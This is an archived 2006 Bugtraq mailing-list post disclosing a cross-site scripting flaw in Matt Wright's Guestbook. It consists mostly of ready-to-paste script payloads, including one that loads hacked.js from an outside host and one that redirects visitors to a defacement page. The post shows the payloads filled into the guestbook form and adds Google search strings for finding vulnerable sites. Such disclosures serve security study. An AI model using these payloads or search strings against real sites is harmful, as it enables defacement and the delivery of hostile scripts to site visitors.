[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060408133309.17444.qmail@securityfocus.com>
Date: 8 Apr 2006 13:33:09 -0000
From: liz0@...mail.com
To: bugtraq@...urityfocus.com
Subject: Matt Wright Guestbook Xss Script İnjection
Matt Wright Guestbook Xss Script İnjection
----------------------------------------------------
site:http://www.scriptarchive.com/
demo:http://www.scriptarchive.com/readme/guestbook.html
--------------------------------------------------
Post This Code:
<script>alert(/Liz0ziM/)</script>
<script src=http://liz0.li.funpic.org/hacked.js></script>
<script>location.href="http://evilsite.com/deface.html";</script>
vs..
---------------------------------------------------------
Example Post Message :
Your Name:<script>alert(/Liz0ziM/)</script>
E-Mail:<script>alert(/Liz0ziM/)</script>
URL:blabla
City:blabla , State:blabla Country:blabla
Comments:<script>location.href="http://evilsite.com/deface.html";</script>
----------------------------------------------------------
Credit:Liz0ziM
Mail:liz0@...mail.com
Site:www.biyo.tk,www.biyosecurity.be
------------------------------------------------------------
Google:
"Scripts and guestbook created by: Matt Wright "
inurl:guestbook.html
inurl:addguest.html
inurl:"* Back to the Guestbook Entries"
---------------------------------------------------------------
Source:
http://www.blogcu.com/Liz0ziM/431712/
http://liz0zim.no-ip.org/mattguestbook.html
Powered by blists - more mailing lists